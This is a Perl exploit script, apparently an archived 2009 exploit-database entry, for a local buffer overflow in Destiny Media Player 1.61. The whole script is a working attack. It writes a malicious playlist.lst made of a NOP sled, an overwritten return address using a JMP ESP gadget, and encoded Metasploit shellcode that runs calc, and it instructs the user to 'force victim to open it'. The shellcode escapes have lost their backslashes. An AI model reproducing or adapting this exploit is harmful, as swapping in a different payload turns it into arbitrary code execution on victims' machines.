dmp161lst1-overflow.txt
Posted on 05 January 2009
#!/user/bin/perl #Destiny Media Player 1.61 Local BoF Code #Exploit Coded by : sCORPINo #Snoop Security Researching Committe #originally discovered by: Encrypt3d.M!nd # windows/exec - 142 bytes # http://www.metasploit.com # Encoder: x86/fnstenv_mov # EXITFUNC=thread, CMD=calc $shellcode = "x6ax1ex59xd9xeexd9x74x24xf4x5bx81x73x13x64" . "xfcxb1x5dx83xebxfcxe2xf4x98x14xf5x5dx64xfc" . "x3ax18x58x77xcdx58x1cxfdx5exd6x2bxe4x3ax02" . "x44xfdx5ax14xefxc8x3ax5cx8axcdx71xc4xc8x78" . "x71x29x63x3dx7bx50x65x3ex5axa9x5fxa8x95x59" . "x11x19x3ax02x40xfdx5ax3bxefxf0xfaxd6x3bxe0" . "xb0xb6xefxe0x3ax5cx8fx75xedx79x60x3fxeex6c" . "x92x9cxe7x39xefxbax81xd6x24xf0x3ax2dx78x51" . "x3ax35x6cx75x49xdexa4x96xe1x35x8bx32x51x3d" . "x0cx64x4fxd7x6axabx4exbax07x9dxddx3ex64xfc" . "xb1x5d"; $nops = "x90" x 2052; #fill the buffer $nops2 = "x90" x 100; #fill the buffer more:p $eip = "x65x82xA5x7c"; #7CA58265 JMP ESP $attack = $nops.$eip.$nops.$shellcode; #sandwich $playlist="playlist.lst"; #playlist name,chage it to anything you want intro(); open($FILE, ">$playlist"); print $FILE $attack; close($FILE); print " $playlist created beside this exploit. "; print "force victim to open it with Destiny Media Player 1.61 "; print "good luck "; sub intro{ print qq( ############################################################ ## Snoop Security Researching Committe ## ## www.snoop-security.com ## ## sCORPINo ## ## Destiny Media Player 1.61 Local BoF Code ## ## found by: ## ## http://www.milw0rm.com/exploits/7652 ## ## special tnX to: ## ## Shahriyar, Adel, Alireza, Yashar and all snoop members ## ## just run and open the playlist.lst with ## ## Destiny Media Player.then BOOM ! ## ############################################################ ); }
